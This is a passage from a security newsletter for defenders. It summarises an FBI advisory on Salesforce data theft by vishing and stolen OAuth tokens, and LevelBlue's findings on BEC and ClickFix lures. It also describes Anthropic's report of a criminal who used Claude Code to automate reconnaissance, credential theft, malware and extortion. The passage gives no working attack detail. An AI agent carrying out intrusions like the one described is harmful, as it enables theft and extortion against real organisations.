UNC6395, meanwhile, leveraged OAuth tokens stolen in a compromise of Salesloft’s GitHub repos, using them to infiltrate Salesforce environments and pull sensitive support case data. That exfiltrated data included AWS keys, passwords, and Snowflake tokens, giving attackers potential access to other cloud environments. Salesloft and Salesforce revoked the stolen tokens on August 20, 2025.

According to BleepingComputer, the attackers themselves have claimed responsibility for both clusters of activity under the name “Scattered Lapsus$ Hunters.” The FBI’s alert notes that “some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data.”

The FBI advises training call-center staff against vishing, enforcing phishing-resistant MFA, applying least-privilege controls to accounts and integrations, monitoring API usage, and rotating tokens regularly.

In addition to the FBI’s recommendations, it’s important to remember that successful impersonation depends on access to employee data. The attackers behind these Salesforce breaches have claimed they originate from and overlap with Lapsus$, Scattered Spider, and ShinyHunters. As we noted in the last Dispatch, the latest joint advisory on Scattered Spider notes that the group enriches its social engineering/vishing campaigns with information from social media, commercial data brokers, and other sources. Reducing exposed PII across these channels cuts off the raw material attackers rely on, making impersonation attempts far harder to execute.

Read the FBI advisory: 250912.pdf

Learn more:

• FBI warns of UNC6040, UNC6395 hackers stealing Salesforce data
• The Cost of a Call: From Voice Phishing to Data Extortion | Google Cloud Blog
• Hello, Operator? A Technical Analysis of Vishing Threats | Google Cloud Blog

LevelBlue’s Latest Threat Trends Report: BEC and social engineering dominate

BEC and social engineering accounted for a whopping 96% of recent incidents investigated by LevelBlue

LevelBlue’s latest Threat Trends report, covering incidents investigated from January–May 2025, shows social engineering dominating: nearly all intrusions came down to Business Email Compromise (BEC) or other forms of social engineering.

BEC accounted for 57% of incidents, while non-BEC social engineering, bolstered by fake CAPTCHA/“ClickFix” campaigns, jumped 214% and made up 39%. Put together, that’s nearly all incidents tied to social engineering tactics.

Edition One of LevelBlue’s Threat Trends Report (released in February and covering H2 2024) provided important context on how BEC actually works: LevelBlue found that 96% of BEC cases with a known entry point began with phishing-driven credential harvesting. In other words, BEC overwhelmingly depends on social engineering at the initial compromise stage.

Edition Two highlights the rise of ClickFix attacks. The campaigns begin either via phishing/malspam or through injected code on compromised sites. In practice, phishing is the most common delivery path; the fake CAPTCHA is simply the new trick once the victim clicks through.

The report notes that “fake CAPTCHA campaigns, including ClickFix, rely on social engineering techniques, exploiting the appearance of legitimacy to trick victims into executing malicious scripts.”

According to the report, ClickFix campaigns “showed an astounding 1,450% jump in related incidents from the second half of 2024 to the first half of 2025.” LevelBlue warns this technique is poised to become a “go-to” initial access method for the next year.

Takeaway for defenders: Social engineering remains the universal entry point. Traditional credential phishing fuels most BEC, and fake CAPTCHAs are emerging as the next big lure. Email filtering and awareness are not enough. Defenses must include:

• Personal-data removal to shrink attackers’ reconnaissance pool and prevent targeted phishing campaigns.
• Phishing-resistant MFA to prevent credential abuse.
• Strict URL/DNS filtering to block lure domains and malvertising chains.
• Browser hardening and EDR tuned for clipboard hijacks and suspicious script execution.

Read the full report here: LevelBlue Threat Trends Report, 2025, Edition Two

Learn more: From Clipboard to Compromise: A PowerShell Self-Pwn | Proofpoint AU

Anthropic Threat Intelligence Report: One Hacker using Agentic AI breached multiple organizations

An attacker used an AI coding agent to run entire breaches end-to-end.

Anthropic’s latest threat intel report details how a single operator leveraged Claude Code to automate every phase of an intrusion:

“A cybercriminal used Claude Code to conduct a scaled data extortion operation across multiple international targets in a short timeframe. This threat actor leveraged Claude’s code execution environment to automate reconnaissance, credential harvesting, and network penetration at scale, potentially affecting at least 17 distinct organizations in just the last month across government, healthcare, emergency services, and religious institutions.”

The AI agent scanned thousands of VPN endpoints and internet-facing systems, guided credential harvesting and privilege escalation, developed custom malware with anti-detection features, and exfiltrated sensitive data including healthcare records, government credentials, and financial information. It also organized the stolen data and generated tailored ransom notes with calculated demands of up to $500,000.

This case is likely a harbinger of more to come: agentic AI is lowering the barrier for attackers and making it possible for even a single operator to carry out breaches at a scale and speed that once required entire skilled teams.

The same techniques (API-driven aggregation, large-scale scraping, automated behavioral profiling) can just as easily be applied to harvesting public PII from data brokers, people-search sites, breach repositories, and social media, fueling highly targeted mass social engineering, credential-cracking, and account takeover campaigns. Reducing exposures of all kinds, from internet-facing systems to employee and executive PII, is essential to disrupt this emerging AI-powered threat.

The report includes other case studies and notes that “while specific to Claude, the case studies presented…likely reflect consistent patterns of behaviour across all frontier AI models.”

Read the full report here: Detecting and countering misuse of AI: August 2025 \ Anthropic